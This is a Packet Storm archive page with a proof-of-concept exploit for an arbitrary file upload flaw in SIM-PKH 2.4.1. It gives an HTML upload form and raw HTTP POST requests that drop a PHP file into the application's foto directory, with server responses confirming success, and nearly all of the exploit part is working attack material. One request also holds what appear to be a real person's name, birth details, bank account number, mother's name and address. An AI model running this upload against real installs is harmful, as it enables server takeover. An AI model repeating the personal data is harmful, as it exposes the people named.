what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SIM-PKH 2.4.1 Shell Upload

SIM-PKH 2.4.1 Shell Upload
Posted Oct 23, 2018
Authored by Ihsan Sencan

SIM-PKH version 2.4.1 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell, file upload
SHA-256 | a484687a4acfa5a267e0dc6d475f82085f26a85fa66fa1d3c43ff891fde90d64
Download | Favorite | View

SIM-PKH 2.4.1 Shell Upload

Change Mirror Download
# Exploit Title: SIM-PKH 2.4.1 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-10-22
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://simpkh.sourceforge.io/
# Software Link: https://sourceforge.net/projects/simpkh/files/latest/download
# Version: 2.4.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
 
# POC: 
# 2)
# Everyone....
 
<form method="POST" enctype="multipart/form-data" action="http://localhost/[PATH]/admin/modul/mod_pengurus/aksi_pengurus.php?module=pengurus&act=update">
<input name="fupload" type="file"> 
<input value="Upload" type="submit"></td></tr>
</form>
 
# Upload Path: http://localhost/[PATH]/foto/59phpinfo2.php
 
POST /[PATH]/admin/modul/mod_pengurus/aksi_pengurus.php?module=pengurus&act=update HTTP/1.1
Host: 192.168.1.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=sbl43od8c5ceereifi8qidm923
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------10453613844351558052030056362
Content-Length: 261
-----------------------------10453613844351558052030056362
Content-Disposition: form-data; name="fupload"; filename="phpinfo2.php"
Content-Type: application/force-download
<?php
phpinfo();
?>
-----------------------------10453613844351558052030056362--
HTTP/1.1 200 OK
Date: Mon, 22 Oct 2018 15:59:01 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5554
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
 
 
# http://localhost/[PATH]/foto/59phpinfo2.php
 
GET /sim-pkh/foto/59phpinfo2.php HTTP/1.1
Host: 192.168.1.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=sbl43od8c5ceereifi8qidm923
Connection: keep-alive
HTTP/1.1 200 OK
Date: Mon, 22 Oct 2018 15:59:28 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
 
# POC: 
# 2)
# Users....
# http://localhost/[PATH]/admin/modul/mod_pengurus/aksi_pengurus.php?module=pengurus&act=update
  
# Upload Path: http://localhost/[PATH]/foto/25phpinfo.php
 
POST /[PATH]/admin/modul/mod_pengurus/aksi_pengurus.php?module=pengurus&act=update HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: [PATH]/admin/media.php?module=pengurus&act=editpengurus&id=320323241474
Cookie: PHPSESSID=sbl43od8c5ceereifi8qidm923
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------84876618815601613714142368
Content-Length: 2745
-----------------------------84876618815601613714142368
Content-Disposition: form-data; name="id_pengurus"
320323241474
-----------------------------84876618815601613714142368
Content-Disposition: form-data; name="no_rekening"
0401741906
-----------------------------84876618815601613714142368
Content-Disposition: form-data; name="nama"
IMAS
 
-----------------------------84876618815601613714142368
Content-Disposition: form-data; name="tempat"
SUKABUMI
-----------------------------84876618815601613714142368
Content-Disposition: form-data; name="tl"
1985-11-08
-----------------------------84876618815601613714142368
Content-Disposition: form-data; name="Usia"
33
-----------------------------84876618815601613714142368
Content-Disposition: form-data; name="fupload"; filename="phpinfo.php"
Content-Type: application/force-download
<?php
phpinfo();
?>
-----------------------------84876618815601613714142368
Content-Disposition: form-data; name="pekerjaan"
BURUH
-----------------------------84876618815601613714142368
Content-Disposition: form-data; name="ibu_kandung"
ELIS
-----------------------------84876618815601613714142368
Content-Disposition: form-data; name="suami"
-----------------------------84876618815601613714142368
Content-Disposition: form-data; name="alamat"
KP BABAKAN RT 09 RW 02     
-----------------------------84876618815601613714142368
Content-Disposition: form-data; name="no_hp"
-----------------------------84876618815601613714142368
Content-Disposition: form-data; name="id_desa"
4
-----------------------------84876618815601613714142368
Content-Disposition: form-data; name="id_kelompok"
13
-----------------------------84876618815601613714142368
Content-Disposition: form-data; name="id_jabatan"
2
-----------------------------84876618815601613714142368
Content-Disposition: form-data; name="id_status"
1
-----------------------------84876618815601613714142368
Content-Disposition: form-data; name="id_pendamping"
pdp-01
-----------------------------84876618815601613714142368
Content-Disposition: form-data; name="bumil"
0
-----------------------------84876618815601613714142368
Content-Disposition: form-data; name="balita"
1
-----------------------------84876618815601613714142368
Content-Disposition: form-data; name="apras"
1
-----------------------------84876618815601613714142368
Content-Disposition: form-data; name="sd"
0
-----------------------------84876618815601613714142368
Content-Disposition: form-data; name="smp"
2
-----------------------------84876618815601613714142368
Content-Disposition: form-data; name="sma"
0
-----------------------------84876618815601613714142368--
HTTP/1.1 302 Found
Date: Mon, 22 Oct 2018 15:42:39 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: ../../media.php?module=pengurus
Content-Length: 1976
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    53 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close